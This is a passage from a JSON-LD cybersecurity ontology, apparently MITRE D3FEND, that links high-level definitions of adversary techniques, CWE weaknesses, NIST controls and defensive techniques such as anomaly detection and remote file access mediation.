      "d3f:definition": "Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.",
      "d3f:produces": [
        {
          "@id": "d3f:File"
        },
        {
          "@id": "d3f:URL"
        }
      ],
      "rdfs:label": "Spearphishing via Service",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1566"
        },
        {
          "@id": "_:N43620e74bb0042d4ac6c2d9511ad2ee2"
        },
        {
          "@id": "_:N10688bb60fd84c4897caa2e3f9de4e4b"
        }
      ]
    },
    {
      "@id": "_:N43620e74bb0042d4ac6c2d9511ad2ee2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:N10688bb60fd84c4897caa2e3f9de4e4b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:URL"
      }
    },
    {
      "@id": "d3f:PE32ExecutableFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExecutableBinary"
      ],
      "rdfs:label": "PE32 Executable File"
    },
    {
      "@id": "d3f:CWE-494",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-494",
      "d3f:definition": "The product downloads source code or an executable from a remote location and executes the code without sufficiently verifying the origin and integrity of the code.",
      "rdfs:label": "Download of Code Without Integrity Check",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-345"
        },
        {
          "@id": "d3f:CWE-669"
        }
      ]
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_RA-5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": {
        "@id": "d3f:NetworkTrafficAnalysis"
      },
      "d3f:control-name": "Vulnerability Monitoring and Scanning",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "RA-5"
    },
    {
      "@id": "d3f:T1474.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1474.002",
      "d3f:definition": "Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system.",
      "rdfs:label": "Compromise Hardware Supply Chain - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1474"
      },
      "skos:prefLabel": "Compromise Hardware Supply Chain"
    },
    {
      "@id": "d3f:Access",
      "@type": "owl:Class",
      "rdfs:label": "Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Action"
        },
        {
          "@id": "_:N56747a40f296459a82602b5281b2ee14"
        },
        {
          "@id": "_:Ne4714a457f334041b6e21fe7debca57f"
        }
      ]
    },
    {
      "@id": "_:N56747a40f296459a82602b5281b2ee14",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "_:Ne4714a457f334041b6e21fe7debca57f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-mediator"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessMediator"
      }
    },
    {
      "@id": "dcterms:license",
      "@type": "owl:AnnotationProperty"
    },
    {
      "@id": "d3f:RemoteFileAccessMediation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RemoteFileAccessMediation"
      ],
      "d3f:d3fend-id": "D3-RFAM",
      "d3f:definition": "Remote file access mediation is the process of managing and securing access to file systems over a network to ensure that only authorized users or processes can interact with remote files.",
      "d3f:isolates": {
        "@id": "d3f:File"
      },
      "d3f:kb-article": "## How it works\n\nRemote File Access Mediation focuses on controlling how users or processes access file systems from remote locations. This involves ensuring secure connections, often through protocols like SFTP or SMB, and enforcing permissions to prevent unauthorized access or data breaches. Examples of enforcement areas include accessing shared drives or cloud storage from remote offices or home networks.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-NIST-Special-Publication-800-53-Revision-5"
      },
      "d3f:synonym": "File Share Access Mediation",
      "rdfs:label": "Remote File Access Mediation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkResourceAccessMediation"
        },
        {
          "@id": "_:N7bfa9ea5d0b64407b765bb20f8719be9"
        }
      ]
    },
    {
      "@id": "_:N7bfa9ea5d0b64407b765bb20f8719be9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:T1628.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1628.001",
      "d3f:definition": "A malicious application could suppress its icon from being displayed to the user in the application launcher. This hides the fact that it is installed, and can make it more difficult for the user to uninstall the application. Hiding the application's icon programmatically does not require any special permissions.",
      "rdfs:label": "Suppress Application Icon - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1628"
      },
      "skos:prefLabel": "Suppress Application Icon"
    },
    {
      "@id": "d3f:T1552.007",
      "@type": "owl:Class",
      "d3f:attack-id": "T1552.007",
      "d3f:definition": "Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API)",
      "rdfs:label": "Container API",
      "rdfs:subClassOf": {
        "@id": "d3f:T1552"
      }
    },
    {
      "@id": "d3f:WatchdogTimerEvent",
      "@type": "owl:Class",
      "d3f:definition": "A watchdog timer event is any occurrence in which a watchdog timer is started, updated, reset, expired, or otherwise interacts with the system it monitors, resulting in a state change, status report, or corrective action intended to detect, signal, or recover from abnormal or stalled system behavior.",
      "rdfs:label": "Watchdog Timer Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:TimerEvent"
        },
        {
          "@id": "_:Na2e21c0b6f834274b560af9f00ef377c"
        }
      ]
    },
    {
      "@id": "_:Na2e21c0b6f834274b560af9f00ef377c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WatchdogTimer"
      }
    },
    {
      "@id": "d3f:T0895",
      "@type": "owl:Class",
      "d3f:attack-id": "T0895",
      "d3f:definition": "Adversaries may leverage AutoRun functionality or scripts to execute malicious code. Devices configured to enable AutoRun functionality or legacy operating systems may be susceptible to abuse of these features to run malicious code stored on various forms of removeable media (i.e., USB, Disk Images [.ISO]). Commonly, AutoRun or AutoPlay are disabled in many operating systems configurations to mitigate against this technique. If a device is configured to enable AutoRun or AutoPlay, adversaries may execute code on the device by mounting the removable media to the device, either through physical or virtual means. This may be especially relevant for virtual machine environments where disk images may be dynamically mapped to a guest system on a hypervisor.",
      "rdfs:label": "Autorun Image - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSExecutionTechnique"
      },
      "skos:prefLabel": "Autorun Image"
    },
    {
      "@id": "d3f:AuthenticationServer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:AuthenticationServiceApplication"
      },
      "d3f:definition": "An authentication server provides a network service that applications use to authenticate the credentials, usually account names and passwords, of their users. When a client submits a valid set of credentials, it receives a cryptographic ticket that it can subsequently use to access various services. Major authentication algorithms include passwords, Kerberos, and public key encryption.",
      "d3f:manages": {
        "@id": "d3f:AuthenticationService"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Authentication_server"
      },
      "rdfs:label": "Authentication Server",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Server"
        },
        {
          "@id": "_:Nb9039f350f1448d6bb8f0eb83b2683df"
        },
        {
          "@id": "_:N1419680f2ed547a0a7296ae8db9f275a"
        }
      ]
    },
    {
      "@id": "_:Nb9039f350f1448d6bb8f0eb83b2683df",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationServiceApplication"
      }
    },
    {
      "@id": "_:N1419680f2ed547a0a7296ae8db9f275a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:manages"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AuthenticationService"
      }
    },
    {
      "@id": "d3f:StringPatternMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SPM",
      "d3f:definition": "String pattern-matching algorithms, also known as string-matching algorithms, are an important class of string algorithms that try to find a place where one or several strings (also called patterns) are found within a larger string or text",
      "d3f:kb-article": "## How it works\nA basic example of string searching is when the pattern and the searched text are arrays of elements of an alphabet (finite set) Σ. Σ may be a human language alphabet, for example, the letters A through Z and other applications may use a binary alphabet (Σ = {0,1}) or a DNA alphabet (Σ = {A,C,G,T}) in bioinformatics.\n\nIn practice, the method of feasible string-search algorithm may be affected by the string encoding. In particular, if a variable-width encoding is in use, then it may be slower to find the Nth character, perhaps requiring time proportional to N. This may significantly slow some search algorithms. One of many possible solutions is to search for the sequence of code units instead, but doing so may produce false matches unless the encoding is specifically designed to avoid it.\n\n## References\n1. String-searching algorithm. (2023, April 8). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/String-searching_algorithm)",
      "rdfs:label": "String Pattern Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:PatternMatching"
      }
    },
    {
      "@id": "d3f:D3FENDKBThing",
      "@type": "owl:Class",
      "rdfs:label": "D3FEND KB Thing"
    },
    {
      "@id": "d3f:Dyna-Q",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DQ",
      "d3f:definition": "A Dyna-Q agent combines acting, learning, and planning.",
      "d3f:kb-article": "## References\nCompNeuro Neuromatch Academy Tutorials. [Link](https://compneuro.neuromatch.io/tutorials/W3D4_ReinforcementLearning/student/W3D4_Tutorial4.html)",
      "rdfs:label": "Dyna-Q",
      "rdfs:subClassOf": {
        "@id": "d3f:Model-basedReinforcementLearning"
      }
    },
    {
      "@id": "d3f:NetworkProtocolAnalyzer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Monitors and parses network protocols to extract values from various network protocol layers.",
      "d3f:monitors": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "Network Protocol Analyzer",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkSensor"
        },
        {
          "@id": "_:Nc7d2301646794a9d874076349f00eb8f"
        }
      ]
    },
    {
      "@id": "_:Nc7d2301646794a9d874076349f00eb8f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:REC-0001.02",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0001.02",
      "d3f:definition": "Firmware intelligence covers microcontroller images, programmable logic bitstreams, boot ROM behavior, peripheral configuration blobs, and anti-rollback or secure-boot settings for devices on the bus. Knowing device types, versions, and footprints enables inference of default passwords, debug interfaces (JTAG, SWD, UART), timing tolerances, and error handling under brownout or thermal stress. A threat actor may obtain firmware from vendor reference packages, public evaluation boards, leaked manufacturing files, over-the-air update images, or crash dumps. Correlating that with board layouts, harness drawings, or part markings helps map trust boundaries and locate choke points like power controllers, bus bridges, and watchdog supervisors. Attack goals include: preparing malicious but apparently valid updates, exploiting unsigned or weakly verified images, forcing downgrades, or manipulating configuration fuses to weaken later defenses. Even when cryptographic verification is present, knowledge of recovery modes, boot-pin strapping, or maintenance commands can offer alternate paths.",
      "rdfs:label": "Firmware - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0001/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0001"
      },
      "skos:prefLabel": "Firmware"
    },
    {
      "@id": "d3f:CWE-683",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-683",
      "d3f:definition": "The product calls a function, procedure, or routine, but the caller specifies the arguments in an incorrect order, leading to resultant weaknesses.",
      "rdfs:label": "Function Call With Incorrect Order of Arguments",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-628"
      }
    },
    {
      "@id": "d3f:MachineLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-ML",
      "d3f:definition": "Machine learning techniques are computational methods that combine statistics, probability, and optimization to make accurate predictions and/or improve performance.",
      "d3f:kb-article": "## References\nMachine learning.\" Wikipedia. [Link](https://en.wikipedia.org/wiki/Machine_learning).",
      "rdfs:label": "Machine Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:AnalyticTechnique"
      }
    },
    {
      "@id": "d3f:T1628.003",
      "@type": "owl:Class",
      "d3f:attack-id": "T1628.003",
      "d3f:definition": "Adversaries may attempt to hide multimedia files from the user. By doing so, adversaries may conceal captured files, such as pictures, videos and/or screenshots, then later exfiltrate those files.",
      "rdfs:label": "Conceal Multimedia Files - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1628"
      },
      "skos:prefLabel": "Conceal Multimedia Files"
    },
    {
      "@id": "d3f:T1096",
      "@type": "owl:Class",
      "d3f:attack-id": "T1096",
      "d3f:definition": "Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1564.004",
      "rdfs:label": "NTFS File Attributes",
      "rdfs:seeAlso": {
        "@id": "d3f:T1564.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:T1001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1001",
      "d3f:definition": "Adversaries may obfuscate command and control traffic to make it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November 2020) Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "rdfs:label": "Data Obfuscation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:N7a4058f563394fdba89ee6982b97ef05"
        }
      ]
    },
    {
      "@id": "_:N7a4058f563394fdba89ee6982b97ef05",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1629",
      "@type": "owl:Class",
      "d3f:attack-id": "T1629",
      "d3f:definition": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may span both native defenses as well as supplemental capabilities installed by users or mobile endpoint administrators.",
      "rdfs:label": "Impair Defenses - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
      },
      "skos:prefLabel": "Impair Defenses"
    },
    {
      "@id": "d3f:T1055.009",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:OperatingSystemFile"
      },
      "d3f:attack-id": "T1055.009",
      "d3f:definition": "Adversaries may inject malicious code into processes via the /proc filesystem in order to evade process-based defenses as well as possibly elevate privileges. Proc memory injection is a method of executing arbitrary code in the address space of a separate live process.",
      "d3f:may-modify": {
        "@id": "d3f:OperatingSystemFile"
      },
      "rdfs:label": "Proc Memory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1055"
        },
        {
          "@id": "_:N365530aa453f4f5b8b752ee8c473d99e"
        },
        {
          "@id": "_:N7c75f932c29b4ca0b8f5a989b26dc3bd"
        }
      ]
    },
    {
      "@id": "_:N365530aa453f4f5b8b752ee8c473d99e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemFile"
      }
    },
    {
      "@id": "_:N7c75f932c29b4ca0b8f5a989b26dc3bd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemFile"
      }
    },
    {
      "@id": "d3f:ProtocolMetadataAnomalyDetection",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ProtocolMetadataAnomalyDetection"
      ],
      "d3f:analyzes": {
        "@id": "d3f:NetworkTraffic"
      },
      "d3f:d3fend-id": "D3-PMAD",
      "d3f:definition": "Collecting network communication protocol metadata and identifying statistical outliers.",
      "d3f:kb-article": "## How it works\nNetwork protocol metadata is first collected and processed in real-time or post-facto. Metadata may include packet header information or information about a session (ex. time between requests/responses). Metadata is then grouped based on shared characteristics and those groups are compared to each other. If particular metadata differs significantly from other data, an alert is generated, identifying the network event as anomalous. Anomalous activity may indicate unauthorized activity.\n\n## Considerations\nMetadata collection on enterprises can yield large data sets. Storage, indexing, querying, and aging should be considered prior to implementation.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MethodAndSystemForDetectingThreatsUsingMetadataVectors_VECTRANETWORKSInc"
        },
        {
          "@id": "d3f:Reference-MethodAndSystemForDetectingThreatsUsingPassiveClusterMapping_VectraNetworksInc"
        },
        {
          "@id": "d3f:Reference-SystemForImplementingThreatDetectionUsingDailyNetworkTrafficCommunityOutliers_VECTRANETWORKSInc"
        }
      ],
      "rdfs:label": "Protocol Metadata Anomaly Detection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N8777a0562b7641fbbfdcc6bf60fde743"
        }
      ]
    },
    {
      "@id": "_:N8777a0562b7641fbbfdcc6bf60fde743",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:T1569",
      "@type": "owl:Class",
      "d3f:attack-id": "T1569",
      "d3f:definition": "This technique has been deprecated.",
      "rdfs:label": "System Services",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:LM-0005",
      "@type": "owl:Class",
      "d3f:attack-id": "LM-0005",
      "d3f:definition": "The adversary pivots across partitions by abusing the mechanisms a separation kernel or hypervisor exposes for inter-partition communication and device sharing. Paths include message ports/queues, shared-memory windows, virtual NICs and bridges, hypercalls, and common driver backends (e.g., storage or DMA engines without strict IOMMU bounds). A foothold in a less-trusted partition, often a payload or guest OS, can be turned into access to a higher-privilege domain by crafting traffic that exploits parser flaws in port services, racing management channels, or coercing backend drivers to perform out-of-bounds operations. Once the boundary is crossed, the actor can reach bus gateways, file systems, or control applications hosted in adjacent partitions and continue movement under the guise of permitted inter-partition exchanges.",
      "rdfs:label": "Virtualization Escape - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/LM-0005/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTALateralMovementTechnique"
      },
      "skos:prefLabel": "Virtualization Escape"
    },
    {
      "@id": "d3f:comments",
      "@type": [
        "owl:DatatypeProperty",
        "owl:FunctionalProperty"
      ],
      "d3f:definition": "x comments y: x claim has provider comments y.",
      "rdfs:label": "comments",
      "rdfs:range": {
        "@id": "xsd:string"
      },
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-catalog-data-property"
      }
    },
    {
      "@id": "d3f:REC-0005.02",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0005.02",
      "d3f:definition": "Downlink collection aims to harvest housekeeping telemetry, event logs, ephemerides, payload data, and operator annotations that reveal system state and procedures. Even when payload content is encrypted, ancillary channels (beacons, health/status, low-rate engineering downlink) can disclose mode transitions, battery and thermal margins, safing events, and next-pass predictions. Community ground networks and public dashboards may inadvertently provide stitched datasets that make trend analysis trivial. Captured framing and coding parameters also help an adversary build testbeds and refine timing for later actions.",
      "rdfs:label": "Downlink Intercept - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0005/02/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0005"
      },
      "skos:prefLabel": "Downlink Intercept"
    },
    {
      "@id": "d3f:AML.T0087",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0087",
      "d3f:definition": "Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, photos, etc.) as well as sensitive details such as credentials or multi-factor authentication (MFA) configurations.\n\nAdversaries may gather this information in various ways, such as direct elicitation, [Search Victim-Owned Websites](/techniques/AML.T0003), or via leaked information on the black market.\n\nAdversaries may use the gathered victim data to Create Deepfakes and impersonate them in a convincing manner. This may create opportunities for adversaries to [Establish Accounts](/techniques/AML.T0021) under the impersonated identity, or allow them to perform convincing [Phishing](/techniques/AML.T0052) attacks.",
      "rdfs:label": "Gather Victim Identity Information - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0087"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASReconnaissanceTechnique"
      },
      "skos:prefLabel": "Gather Victim Identity Information"
    },
    {
      "@id": "d3f:CWE-158",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-158",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes NUL characters or null bytes when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Null Byte or NUL Character",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:T1113",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1113",
      "d3f:definition": "Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as <code>CopyFromScreen</code>, <code>xwd</code>, or <code>screencapture</code>.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware)",
      "d3f:may-access": {
        "@id": "d3f:DisplayServer"
      },
      "d3f:may-invoke": {
        "@id": "d3f:GetScreenCapture"
      },
      "rdfs:label": "Screen Capture",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CollectionTechnique"
        },
        {
          "@id": "_:Nf9cb43c6e4d2480389f99aa7111655fb"
        },
        {
          "@id": "_:Nedc2de1e5f37440593a5084253287979"
        }
      ]
    },
    {
      "@id": "_:Nf9cb43c6e4d2480389f99aa7111655fb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-access"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DisplayServer"
      }
    },
    {
      "@id": "_:Nedc2de1e5f37440593a5084253287979",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetScreenCapture"
      }
    },
    {
      "@id": "d3f:T0807",
      "@type": "owl:Class",
      "d3f:attack-id": "T0807",
      "d3f:definition": "Adversaries may utilize command-line interfaces (CLIs) to interact with systems and execute commands. CLIs provide a means of interacting with computer systems and are a common feature across many types of platforms and devices within control systems environments. (Citation: Enterprise ATT&CK January 2018) Adversaries may also use CLIs to install and run new software, including malicious tools that may be installed over the course of an operation.",
      "rdfs:label": "Command-Line Interface - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSExecutionTechnique"
      },
      "skos:prefLabel": "Command-Line Interface"
    },
    {
      "@id": "d3f:OTControlCommand",
      "@type": "owl:Class",
      "d3f:definition": "Command and control the managed process.",
      "rdfs:comment": [
        "CIP: Reset\nCIP: Start\nCIP: Stop\nCIP: Create\nCIP: Delete\nCIP: Apply Attributes\nCIP: Restore\nCIP: Save ",
        "GE-SRTP: PLC SHORT STATUS REQUEST"
      ],
      "rdfs:label": "OT Control Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTProcessDataCommand"
      }
    },
    {
      "@id": "d3f:Reference-RFC7489-Domain-basedMessageAuthentication-Reporting-AndConformance-DMARC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://tools.ietf.org/html/rfc7489"
      },
      "d3f:kb-abstract": "Domain-based Message Authentication, Reporting, and Conformance(DMARC) is a scalable mechanism by which a mail-originating organization can express domain-level policies and preferences for message validation, disposition, and reporting, that a mail-receiving organization can use to improve mail handling.\n\nOriginators of Internet Mail need to be able to associate reliable and authenticated domain identifiers with messages, communicate policies about messages that use those identifiers, and report about mail using those identifiers.  These abilities have several benefits: Receivers can provide feedback to Domain Owners about the use of their domains; this feedback can provide valuable insight about the management of internal operations and the presence of external domain name abuse.\n\nDMARC does not produce or encourage elevated delivery privilege of authenticated email. DMARC is a mechanism for policy distribution that enables increasingly strict handling of messages that fail authentication checks, ranging from no action, through altered\ndelivery, up to message rejection.",
      "d3f:kb-author": "M. Kucherawy, E. Zwicky",
      "d3f:kb-organization": "Internet Engineering Task Force (IETF)",
      "d3f:kb-reference-of": {
        "@id": "d3f:TransferAgentAuthentication"
      },
      "d3f:kb-reference-title": "RFC 7489: Domain-based Message Authentication, Reporting, and Conformance (DMARC)",
      "rdfs:label": "Reference - RFC 7489: Domain-based Message Authentication, Reporting, and Conformance (DMARC) - IETF"
    },
    {
      "@id": "d3f:Reference-System,Method,AndComputerProgramProductForDetectingAndAssessingSecurityRisksInANetwork_ExabeamInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20190034641A1"
      },
      "d3f:kb-abstract": "The present disclosure is directed to a system, method, and computer program for detecting and assessing security risks in an enterprise's computer network. A behavior model is built for a user in the network based on the user's interactions with the network, wherein a behavior model for a user indicates client device(s), server(s), and resources used by the user. The user's behavior during a period of time is compared to the user's behavior model. A risk assessment is calculated for the period of time based at least in part on the comparison between the user's behavior and the user's behavior model, wherein any one of certain anomalies between the user's behavior and the user's behavior model increase the risk assessment.",
      "d3f:kb-author": "Sylvain Gil; Domingo Mihovilovic; Nir Polak; Magnus Stensmo; Sing Yip",
      "d3f:kb-mitre-analysis": "This patent describes calculating a risk score to detect anomalies in user activity based on comparing a user's current session with a user behavior model. The user behavior model is comprised of a number of histograms including:\n\n* client devices from which the user logs in\n* servers accessed\n* data accessed\n* applications accessed\n* session duration\n* logon time of day\n* logon day of week\n* geo - location of logon origination\n\nThe system has an initial training period with x number of days (e. g., 90 days) in which session data is recorded in behavior models before behavior analysis begins.The histograms are then used to determine anomalies between current session activity and a user's behavior model. Values for a histogram category are along one axis and the number of times the value is received for the category is along another axis. If a data point value associated with the current user session is over an anomaly threshold, an alert is generated.",
      "d3f:kb-organization": "Exabeam Inc",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:AuthenticationEventThresholding"
        },
        {
          "@id": "d3f:AuthorizationEventThresholding"
        },
        {
          "@id": "d3f:ResourceAccessPatternAnalysis"
        },
        {
          "@id": "d3f:SessionDurationAnalysis"
        },
        {
          "@id": "d3f:UserGeolocationLogonPatternAnalysis"
        }
      ],
      "d3f:kb-reference-title": "System, method, and computer program product for detecting and assessing security risks in a network",
      "rdfs:label": "Reference - System, method, and computer program product for detecting and assessing security risks in a network - Exabeam Inc"
    },
    {
      "@id": "d3f:PhysicalLinkConnectEvent",
      "@type": "owl:Class",
      "d3f:definition": "The medium is attached or the port is enabled, establishing electrical or optical continuity so that link negotiation can begin.",
      "rdfs:label": "Physical Link Connect Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalLinkEvent"
        },
        {
          "@id": "_:N41c4d9f402c04d7eaf4fdcbb280df169"
        }
      ]
    },
    {
      "@id": "_:N41c4d9f402c04d7eaf4fdcbb280df169",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:precedes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLinkUpEvent"
      }
    },
    {
      "@id": "d3f:kb-reference",
      "@type": "owl:ObjectProperty",
      "owl:inverseOf": {
        "@id": "d3f:kb-reference-of"
      },
      "rdfs:label": "kb-reference",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-object-property"
      },
      "skos:altLabel": "has-technique-reference"
    },
    {
      "@id": "d3f:may-produce",
      "@type": "owl:ObjectProperty",
